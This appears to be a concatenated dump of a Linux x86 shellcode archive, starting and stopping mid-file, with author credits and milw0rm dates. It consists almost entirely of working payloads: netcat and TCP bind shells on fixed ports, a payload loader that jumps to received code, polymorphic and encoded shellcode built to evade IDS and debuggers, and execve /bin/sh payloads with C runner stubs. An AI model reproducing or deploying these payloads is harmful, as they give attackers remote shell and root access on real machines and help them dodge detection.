| "\x68UVWa" /* pushl "UVWa" */ 19 | "\x68QRPT" /* pushl "QRPT" */ 20 | "\x68PTXR" /* pushl "PTXR" */ 21 | "\x68binH" /* pushl "binH" */ 22 | "\x68IQ50" /* pushl "IQ50" */ 23 | "\x68shDY" /* pushl "shDY" */ 24 | "\x68Rha0" /* pushl "Rha0" */ 25 | /*--------------------------------------*/ 26 | 27 | 28 | // milw0rm.com [2004-12-22] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Alphanumeric_Encoder__IMUL_Method__Shellcode__88_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------*/ 2 | /* Alpha-Numeric Shellcode using IMUL Method */ 3 | /* By XORt@dallas_2600) 88bytes */ 4 | /*-----------------------------------------------------*/ 5 | "\x68\x69\x58\x69\x6b" /* push $0x6b695869 */ 6 | "\x68\x7a\x36\x37\x70" /* push $0x7037367a */ 7 | "\x68\x58\x58\x41\x73" /* push $0x73415858 */ 8 | "\x68\x71\x4a\x77\x79" /* push $0x79774a71 */ 9 | "\x68\x65\x77\x57\x31" /* push $0x31577765 */ 10 | "\x68\x42\x69\x57\x77" /* push $0x6850c031 */ 11 | "\x50\x50\x50\x50\x50" /* 17 push %eax's */ 12 | 
"\x50\x50\x50\x50\x50" /* */ 13 | "\x50\x50\x50\x50\x50" /* */ 14 | "\x50\x50" /* */ 15 | "\x54" /* push %esp */ 16 | "\x59" /* pop %ecx */ 17 | "\x6b\x51\x58\x57" /* imul $0x57, 0x58(%ecx), %edx */ 18 | "\x42" /* inc %edx */ 19 | "\x52" /* push %edx */ 20 | "\x6b\x41\x54\x78" /* imul $0x78, 0x54(%ecx), %edx */ 21 | "\x34\x63" /* xor $0x63, %al */ 22 | "\x50" /* push %eax */ 23 | "\x6b\x51\x50\x4a" /* imul $0x4a, 0x50(%ecx), %edx */ 24 | "\x4a" /* dec %edx */ 25 | "\x4a" /* dec %edx */ 26 | "\x52" /* push %edx */ 27 | "\x6b\x51\x4c\x79" /* imul $0x79, 0x4c(%ecx), %edx */ 28 | "\x4a" /* dec %edx */ 29 | "\x52" /* push %edx */ 30 | "\x6b\x41\x48\x36" /* imul $0x36, 0x48(%ecx), %edx */ 31 | "\x34\x61" /* xor $0x61, %al */ 32 | "\x50" /* push %eax */ 33 | "\x6b\x51\x44\x79" /* imul $0x79, 0x44(%ecx), %edx */ 34 | "\x4a" /* dec %edx */ 35 | "\x52" /* push %edx */ 36 | /*------------------------------------------[bytes:88]-*/ 37 | 38 | 39 | // milw0rm.com [2004-12-22] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Anti-Debug_Trick__INT_3h_trap__+_execve__bin_sh_Shellcode__39_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes 3 | * 4 | * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS 5 | * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode 6 | * from running within a debugger environment such as gdb and strace. 7 | * 8 | * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it 9 | * to call the acutal payload (e.g. 
_evil_code) while a greedy debugger or a confused x86-emu won't pass 10 | * the signal handler to the shellcode, it would end up doing _exit() instead execuve() 11 | * 12 | * - izik 13 | */ 14 | 15 | char shellcode[] = 16 | 17 | "\x6a\x30" // push $0x30 18 | "\x58" // pop %eax 19 | "\x6a\x05" // push $0x5 20 | "\x5b" // pop %ebx 21 | "\xeb\x05" // jmp <_evil_code> 22 | 23 | // 24 | // <_evilcode_loc>: 25 | // 26 | 27 | "\x59" // pop %ecx 28 | "\xcd\x80" // int $0x80 29 | "\xcc" // int3 30 | "\x40" // inc %eax 31 | "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc> 32 | "\x99" // cltd 33 | 34 | // 35 | // <_evil_code>: 36 | // 37 | 38 | "\xb0\x0b" // mov $0xb,%al 39 | "\x52" // push %edx 40 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 41 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 42 | "\x89\xe3" // mov %esp,%ebx 43 | "\x52" // push %edx 44 | "\x53" // push %ebx 45 | "\x54" // push %esp 46 | "\xeb\xe1"; // jmp <_evilcode_loc> 47 | 48 | int main(int argc, char **argv) { 49 | int *ret; 50 | ret = (int *)&ret + 2; 51 | (*ret) = (int) shellcode; 52 | } 53 | 54 | // milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat_Shell__13377_TCP__Shellcode__Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | linux x86 nc -lvve/bin/sh -p13377 shellcode 2 | This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker 3 | Author: Anonymous 4 | Site: http://chaossecurity.wordpress.com/ 5 | Here is code written in NASM 6 | 7 | ///////////////////////////// 8 | section .text 9 | global _start 10 | _start: 11 | xor eax,eax 12 | xor edx,edx 13 | push 0x37373333 14 | push 0x3170762d 15 | mov edx, esp 16 | push eax 17 | push 0x68732f6e 18 | push 0x69622f65 19 | push 0x76766c2d 20 | mov ecx,esp 21 | push eax 22 | push 0x636e2f2f 23 | push 0x2f2f2f2f 24 | push 0x6e69622f 25 | mov ebx, esp 26 | 
push eax 27 | push edx 28 | push ecx 29 | push ebx 30 | xor edx,edx 31 | mov ecx,esp 32 | mov al,11 33 | int 0x80 34 | ////////////////////////////////// 35 | And here is objdump from which you can see the shellcode 36 | 37 | ////////////////////////////////// 38 | teo@teo-desktop ~ $ objdump -d a.out 39 | 40 | a.out: file format elf32-i386 41 | 42 | 43 | Disassembly of section .text: 44 | 45 | 08048060 <.text>: 46 | 8048060: 31 c0 xor %eax,%eax 47 | 8048062: 31 d2 xor %edx,%edx 48 | 8048064: 68 33 33 37 37 push $0x37373333 49 | 8048069: 68 2d 76 70 31 push $0x3170762d 50 | 804806e: 89 e2 mov %esp,%edx 51 | 8048070: 50 push %eax 52 | 8048071: 68 6e 2f 73 68 push $0x68732f6e 53 | 8048076: 68 65 2f 62 69 push $0x69622f65 54 | 804807b: 68 2d 6c 76 76 push $0x76766c2d 55 | 8048080: 89 e1 mov %esp,%ecx 56 | 8048082: 50 push %eax 57 | 8048083: 68 2f 2f 6e 63 push $0x636e2f2f 58 | 8048088: 68 2f 2f 2f 2f push $0x2f2f2f2f 59 | 804808d: 68 2f 62 69 6e push $0x6e69622f 60 | 8048092: 89 e3 mov %esp,%ebx 61 | 8048094: 50 push %eax 62 | 8048095: 52 push %edx 63 | 8048096: 51 push %ecx 64 | 8048097: 53 push %ebx 65 | 8048098: 31 d2 xor %edx,%edx 66 | 804809a: 89 e1 mov %esp,%ecx 67 | 804809c: b0 0b mov $0xb,%al 68 | 804809e: cd 80 int $0x80 -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat_Shell__5555_TCP__Shellcode__60_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #Greetz : Bomberman(Leader) 2 | #Author : B3mB4m 3 | #Concat : Do not disturb - Bomberman 4 | 5 | 6 | #Netcat openbsd version (which is default installed in ubuntu) have not "-e" option. 7 | #So if you are trying to test on ubuntu(like me) you must change version to traditional. 
8 | 9 | #Typing this: 10 | #1) sudo update-alternatives --config nc 11 | #2) Select the option /bin/nc.traditional 12 | 13 | 14 | Disassembly of section .text: 15 | 16 | 08048060 <.text>: 17 | 8048060: 31 c0 xor %eax,%eax 18 | 8048062: 50 push %eax 19 | 8048063: 68 6e 2f 6e 63 push $0x636e2f6e 20 | 8048068: 68 2f 2f 62 69 push $0x69622f2f 21 | 804806d: 89 e3 mov %esp,%ebx 22 | 804806f: 50 push %eax 23 | 8048070: 68 35 35 35 35 push $0x35353535 #PORT 24 | 8048075: 68 2d 6c 74 70 push $0x70746c2d 25 | 804807a: 89 e1 mov %esp,%ecx 26 | 804807c: 50 push %eax 27 | 804807d: 68 2f 2f 73 68 push $0x68732f2f 28 | 8048082: 68 2f 62 69 6e push $0x6e69622f 29 | 8048087: 68 2d 65 2f 2f push $0x2f2f652d 30 | 804808c: 89 e2 mov %esp,%edx 31 | 804808e: 50 push %eax 32 | 804808f: 52 push %edx 33 | 8048090: 51 push %ecx 34 | 8048091: 53 push %ebx 35 | 8048092: 89 e7 mov %esp,%edi 36 | 8048094: b0 0b mov $0xb,%al 37 | 8048096: 89 f9 mov %edi,%ecx 38 | 8048098: 31 d2 xor %edx,%edx 39 | 804809a: cd 80 int $0x80 40 | 41 | #include 42 | #include 43 | 44 | char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35" 45 | "\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68" 46 | "\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80"; 47 | 48 | // "\x68-----\x35\x35\x35\x35\-------x68\" There port change however you like. 
49 | 50 | int main(void){ 51 | fprintf(stdout,"Length: %d\n",strlen(loveme)); 52 | (*(void(*)()) loveme)();} -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__13337_TCP__Shellcode__56_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Linux x86 /bin/nc -le /bin/sh -vp13337 shellcode(56bytes) 3 | # Author: Author: sajith 4 | # Tested on: i686 GNU/Linux 5 | # Shellcode Length: 56 6 | #SLAE - 750 7 | 8 | Disassembly of section .text: 9 | 10 | 08048060 <_start>: 11 | 8048060: 31 c0 xor eax,eax 12 | 8048062: 50 push eax 13 | 8048063: 68 33 33 33 37 push 0x37333333 14 | 8048068: 68 2d 76 70 31 push 0x3170762d 15 | 804806d: 89 e6 mov esi,esp 16 | 804806f: 50 push eax 17 | 8048070: 68 2f 2f 73 68 push 0x68732f2f 18 | 8048075: 68 2f 62 69 6e push 0x6e69622f 19 | 804807a: 68 2d 6c 65 2f push 0x2f656c2d 20 | 804807f: 89 e7 mov edi,esp 21 | 8048081: 50 push eax 22 | 8048082: 68 2f 2f 6e 63 push 0x636e2f2f 23 | 8048087: 68 2f 62 69 6e push 0x6e69622f 24 | 804808c: 89 e3 mov ebx,esp 25 | 804808e: 50 push eax 26 | 804808f: 56 push esi 27 | 8048090: 57 push edi 28 | 8048091: 53 push ebx 29 | 8048092: 89 e1 mov ecx,esp 30 | 8048094: b0 0b mov al,0xb 31 | 8048096: cd 80 int 0x80 32 | 33 | 34 | gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | unsigned char code[] = \ 41 | 42 | "\x31\xc0\x50\x68\x33\x33\x33\x37\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 43 | 44 | main() 45 | { 46 | 47 | printf("Shellcode Length: %d\n", strlen(code)); 48 | 49 | int (*ret)() = (int(*)())code; 50 | 51 | ret(); 52 | 53 | } -------------------------------------------------------------------------------- 
/Lin_x86/Linux_x86_-_Bind_Netcat___bin_nc___bin_sh_Shell__17771_TCP__Shellcode__58_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | # Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode 3 | # This shellcode will listen on port 17771 and give you /bin/sh 4 | # Shellcode Author: Oleg Boytsev 5 | # Tested on: Debian GNU/Linux 7/i686 6 | # Shellcode Length: 58 7 | # Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode 8 | 9 | global _start 10 | section .text 11 | _start: 12 | xor eax, eax 13 | xor edx, edx 14 | push eax 15 | push 0x31373737 ;-vp17771 16 | push 0x3170762d 17 | mov esi, esp 18 | 19 | push eax 20 | push 0x68732f2f ;-le//bin//sh 21 | push 0x6e69622f 22 | push 0x2f656c2d 23 | mov edi, esp 24 | 25 | push eax 26 | push 0x636e2f2f ;/bin//nc 27 | push 0x6e69622f 28 | mov ebx, esp 29 | 30 | push edx 31 | push esi 32 | push edi 33 | push ebx 34 | mov ecx, esp 35 | mov al,11 36 | int 0x80 37 | */ 38 | 39 | #include 40 | #include 41 | 42 | unsigned char shellcode[] = 43 | "\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 44 | 45 | main() 46 | { 47 | printf("Shellcode Length: %d\n",strlen(shellcode)); 48 | int (*ret)() = (int(*)())shellcode; 49 | ret(); 50 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Listener__5555_TCP__+_Receive_Shellcode_+_Payload_Loader_Shellcode__83_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | _ __ __ ___ __ 3 | | |/ /__ ____ ____ / |/ /_ __/ /_____ _ 4 | | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ 5 | / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / 6 | 
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ 7 | 8 | xenomuta\x40phreaker\x2enet 9 | http://xenomuta.tuxfamily.org/ - Methylxantina 256mg 10 | 11 | Description: 12 | linux/x86 listens for shellcode on tcp/5555 and jumps to it 13 | OS: Linux 14 | Arch: x86 15 | Length: 83 bytes 16 | Author: XenoMuta 17 | 18 | greetz to: 19 | str0k3 (tnx for your effort), emra (fragancia), 20 | fr1t0l4y (dejate ver), garay (no me olvido de los pobres ;p ) 21 | - God bless you all - 22 | */ 23 | .global _start 24 | 25 | _start: 26 | xor %ebx, %ebx 27 | mov %ebx, %eax 28 | 29 | _socket: 30 | push $0x6 31 | push $0x1 32 | push $0x2 33 | mov $0x66, %al 34 | incb %bl 35 | mov %esp, %ecx 36 | int $0x80 37 | 38 | _bind: 39 | mov %eax, %edi 40 | xor %edx, %edx 41 | push %edx 42 | pushw $0xb315 /* 5555 */ 43 | pushw %bx 44 | mov %esp, %ecx 45 | push $0x10 46 | push %ecx 47 | push %edi 48 | mov $0x66, %al 49 | incb %bl 50 | mov %esp, %ecx 51 | int $0x80 52 | 53 | _listen: 54 | incb %bl 55 | push $0x1 56 | push %edi 57 | mov $0x66, %al 58 | incb %bl 59 | mov %esp, %ecx 60 | int $0x80 61 | 62 | _accept: 63 | push %edx 64 | push %edx 65 | push %edi 66 | mov $0x66, %al 67 | incb %bl 68 | mov %esp, %ecx 69 | int $0x80 70 | mov %eax, %ebx 71 | 72 | _read: 73 | mov $0x3, %al 74 | mov %esp, %ecx 75 | mov $0x7ff, %dx 76 | incb %dl 77 | int $0x80 78 | jmp *%ecx /* Jump to our shellcode */ 79 | 80 | ; milw0rm.com [2009-09-09] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Shell__31337_TCP__+_setreuid_0,0__Polymorphic_Shellcode__131_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode. 3 | Name : 131 bytes bind port 31337 x86 linux polymorphic shellcode. 
4 | Date : Sat Jun 17 21:27:03 2010 5 | Author : gunslinger_ 6 | Web : http://devilzc0de.org 7 | blog : http://gunslingerc0de.wordpress.com 8 | tested on : linux debian 9 | special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) 10 | greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! 11 | */ 12 | 13 | #include 14 | 15 | char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01" 16 | "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5" 17 | "\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8" 18 | "\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f" 19 | "\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16" 20 | "\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b" 21 | "\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5" 22 | "\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e" 23 | "\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"; 24 | 25 | int main(void) 26 | { 27 | fprintf(stdout,"Length: %d\n",strlen(bindport)); 28 | (*(void(*)()) bindport)(); 29 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP_Shell__5074_TCP__Shellcode__92_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * s0t4ipv6@Shellcode.com.ar 3 | * x86 portbind a shell in port 5074 4 | * 92 bytes. 
5 | * 6 | */ 7 | 8 | char shellcode[] = 9 | "\x31\xc0" // xorl %eax,%eax 10 | "\x50" // pushl %eax 11 | "\x40" // incl %eax 12 | "\x89\xc3" // movl %eax,%ebx 13 | "\x50" // pushl %eax 14 | "\x40" // incl %eax 15 | "\x50" // pushl %eax 16 | "\x89\xe1" // movl %esp,%ecx 17 | "\xb0\x66" // movb $0x66,%al 18 | "\xcd\x80" // int $0x80 19 | "\x31\xd2" // xorl %edx,%edx 20 | "\x52" // pushl %edx 21 | "\x66\x68\x13\xd2" // pushw $0xd213 22 | "\x43" // incl %ebx 23 | "\x66\x53" // pushw %bx 24 | "\x89\xe1" // movl %esp,%ecx 25 | "\x6a\x10" // pushl $0x10 26 | "\x51" // pushl %ecx 27 | "\x50" // pushl %eax 28 | "\x89\xe1" // movl %esp,%ecx 29 | "\xb0\x66" // movb $0x66,%al 30 | "\xcd\x80" // int $0x80 31 | "\x40" // incl %eax 32 | "\x89\x44\x24\x04" // movl %eax,0x4(%esp,1) 33 | "\x43" // incl %ebx 34 | "\x43" // incl %ebx 35 | "\xb0\x66" // movb $0x66,%al 36 | "\xcd\x80" // int $0x80 37 | "\x83\xc4\x0c" // addl $0xc,%esp 38 | "\x52" // pushl %edx 39 | "\x52" // pushl %edx 40 | "\x43" // incl %ebx 41 | "\xb0\x66" // movb $0x66,%al 42 | "\xcd\x80" // int $0x80 43 | "\x93" // xchgl %eax,%ebx 44 | "\x89\xd1" // movl %edx,%ecx 45 | "\xb0\x3f" // movb $0x3f,%al 46 | "\xcd\x80" // int $0x80 47 | "\x41" // incl %ecx 48 | "\x80\xf9\x03" // cmpb $0x3,%cl 49 | "\x75\xf6" // jnz 50 | "\x52" // pushl %edx 51 | "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e 52 | "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f 53 | "\x89\xe3" // movl %esp,%ebx 54 | "\x52" // pushl %edx 55 | "\x53" // pushl %ebx 56 | "\x89\xe1" // movl %esp,%ecx 57 | "\xb0\x0b" // movb $0xb,%al 58 | "\xcd\x80" // int $0x80 59 | ; 60 | 61 | main() { 62 | int *ret; 63 | ret=(int *)&ret +2; 64 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 65 | (*ret) = (int)shellcode; 66 | } 67 | 68 | // milw0rm.com [2004-09-12] -------------------------------------------------------------------------------- 
/Lin_x86/Linux_x86_-_Bind_TCP_Shell__5074_TCP__ToUpper_Encoded_Shellcode__226_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Bindshell puerto 5074 (TOUPPER EVASION) 3 | * 226 bytes 4 | * Bindshell original: Matias Sedalo (92 bytes) 5 | * 6 | * La binshell esta codificada usando 2 bytes para 7 | * representar 1 byte original de la siguiente forma: 8 | * byte original: 0xAB 9 | * 0x41 + 0xA = 0x4B; 0x41 + 0xB = 0x4C 10 | * byte codificado: [0x4B 0x4C] 11 | * 12 | * by Tora 13 | */ 14 | 15 | #include 16 | #include 17 | 18 | char shellcode[] = 19 | /* _start */ 20 | "\xeb\x02" /* jmp short A */ 21 | 22 | /* A */ 23 | "\xeb\x05" /* jmp short C */ 24 | 25 | /* B */ 26 | "\xe8\xf9\xff\xff\xff" /* call A */ 27 | 28 | /* C */ 29 | "\x5f" /* pop edi */ 30 | "\x81\xef\xdf\xff\xff\xff" /* sub edi, 0xffffffdf */ 31 | "\x57" /* push edi */ 32 | "\x5e" /* pop esi */ 33 | "\x29\xc9" /* sub ecx, ecx */ 34 | "\x80\xc1\xb8" /* add cl, 0xb8 */ 35 | 36 | /* bucle */ 37 | "\x8a\x07" /* mov al, byte [edi] */ 38 | "\x2c\x41" /* sub al, 0x41 */ 39 | "\xc0\xe0\x04" /* shl al, 4 */ 40 | "\x47" /* inc edi */ 41 | "\x02\x07" /* add al, byte [edi] */ 42 | "\x2c\x41" /* sub al, 0x41 */ 43 | "\x88\x06" /* mov byte [esi], al */ 44 | "\x46" /* inc esi */ 45 | "\x47" /* inc edi */ 46 | "\x49" /* dec ecx */ 47 | "\xe2\xed" /* loop bucle */ 48 | /* Shellcode codificada de 184 (0xb8) bytes */ 49 | "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB" 50 | "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA" 51 | "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO" 52 | "BLAALMNIA"; 53 | 54 | int main(void) 55 | { 56 | int *ret; 57 | char *t; 58 | 59 | for (t = shellcode; *t; t++) 60 | if (islower(*t)) 61 | *t = toupper(*t); 62 | 63 | ret=(int *)&ret +3; 64 | printf("Shellcode lenght=%d\n",strlen(shellcode)); 65 | (*ret) = (int)shellcode; 66 | } 67 | 68 | // milw0rm.com 
[2004-09-26] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__31337_TCP__Shellcode__80_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes 3 | * - izik 4 | */ 5 | 6 | char shellcode[] = 7 | 8 | "\x6a\x66" // push $0x66 9 | "\x58" // pop %eax 10 | "\x99" // cltd 11 | "\x6a\x01" // push $0x1 12 | "\x5b" // pop %ebx 13 | "\x52" // push %edx 14 | "\x53" // push %ebx 15 | "\x6a\x02" // push $0x2 16 | 17 | // 18 | // <_doint>: 19 | // 20 | 21 | "\x89\xe1" // mov %esp,%ecx 22 | "\xcd\x80" // int $0x80 23 | 24 | "\x5b" // pop %ebx 25 | "\x5d" // pop %ebp 26 | "\x52" // push %edx 27 | "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) 28 | "\x0f\xcd" // bswap %ebp 29 | "\x09\xdd" // or %ebx,%ebp 30 | "\x55" // push %ebp 31 | "\x6a\x10" // push $0x10 32 | "\x51" // push %ecx 33 | "\x50" // push %eax 34 | "\x89\xe1" // mov %esp,%ecx 35 | "\xb0\x66" // mov $0x66,%al 36 | "\xcd\x80" // int $0x80 37 | "\xb3\x04" // mov $0x4,%bl 38 | "\xb0\x66" // mov $0x66,%al 39 | "\xcd\x80" // int $0x80 40 | "\x89\x64\x24\x08" // mov %esp,0x8(%esp) 41 | "\x43" // inc %ebx 42 | "\xb0\x66" // mov $0x66,%al 43 | "\xcd\x80" // int $0x80 44 | "\x93" // xchg %eax,%ebx 45 | "\x59" // pop %ecx 46 | 47 | // 48 | // <_dup2loop>: 49 | // 50 | 51 | "\xb0\x3f" // mov $0x3f,%al 52 | "\xcd\x80" // int $0x80 53 | "\x49" // dec %ecx 54 | "\x79\xf9" // jns <_dup2loop> 55 | 56 | "\xb0\x0b" // mov $0xb,%al 57 | "\x52" // push %edx 58 | "\x68\x2f\x2f\x73\x68" // push $0x68732f2f 59 | "\x68\x2f\x62\x69\x6e" // push $0x6e69622f 60 | "\x89\xe3" // mov %esp,%ebx 61 | "\x52" // push %edx 62 | "\x53" // push %ebx 63 | "\xeb\xbb"; // jmp <_doint> 64 | 65 | int main(int argc, char **argv) { 66 | int *ret; 67 | ret = (int *)&ret + 2; 68 | (*ret) = (int) shellcode; 69 | } 70 | 71 | // 
milw0rm.com [2006-01-21] -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__64533_TCP__Shellcode__97_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | /* 5 | 1 ############################################################### 1 6 | 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 7 | 1 ############################################################### 0 8 | 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 9 | 10 | 11 | by Magnefikko 12 | 05.07.2010 13 | magnefikko@gmail.com 14 | Promhyl Studies :: http://promhyl.tk 15 | Subgroup: #PRekambr 16 | Name: 97 bytes bind sh@64533 17 | Platform: Linux x86 18 | 19 | sock = socket(PF_INET, SOCK_STREAM, 0); 20 | bind(sock, *[2, 64533, 0], 16); 21 | listen(sock, 5); 22 | nsock = accept(sock, 0, 0); 23 | dup2(nsock, 0); 24 | dup2(nsock, 1); 25 | execve("/bin/sh", 0, 0); // http://promhyl.tk/index.php?a=art&art=83 26 | 27 | gcc -Wl,-z,execstack filename.c 28 | 29 | shellcode: 30 | 31 | \x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80 32 | 33 | */ 34 | 35 | 36 | int main(){ 37 | char shell[] = 38 | 
"\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80"; 39 | printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.tk\n\nstrlen(shell) 40 | = %d\n", strlen(shell)); 41 | (*(void (*)()) shell)(); 42 | } -------------------------------------------------------------------------------- /Lin_x86/Linux_x86_-_Bind_TCP__bin_sh_Shell__64713_TCP__Shellcode__86_bytes___Shellcode_exploit_for_Lin_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86 3 | * Copyright (c) 2006 Gotfault Security 4 | * 5 | * portbind shellcode that bind()'s a shell on port 64713/tcp 6 | * 7 | */ 8 | 9 | char shellcode[] = 10 | 11 | /* socket(AF_INET, SOCK_STREAM, 0) */ 12 | 13 | "\x6a\x66" // push $0x66 14 | "\x58" // pop %eax 15 | "\x6a\x01" // push $0x1 16 | "\x5b" // pop %ebx 17 | "\x99" // cltd 18 | "\x52" // push %edx 19 | "\x53" // push %ebx 20 | "\x6a\x02" // push $0x2 21 | "\x89\xe1" // mov %esp,%ecx 22 | "\xcd\x80" // int $0x80 23 | 24 | /* bind(s, server, sizeof(server)) */ 25 | 26 | "\x52" // push %edx 27 | "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713 28 | "\x66\x6a\x02" // pushw $0x2 29 | "\x89\xe1" // mov $esp,%ecx 30 | "\x6a\x10" // push $0x10 31 | "\x51" // push %ecx 32 | "\x50" // push %eax 33 | 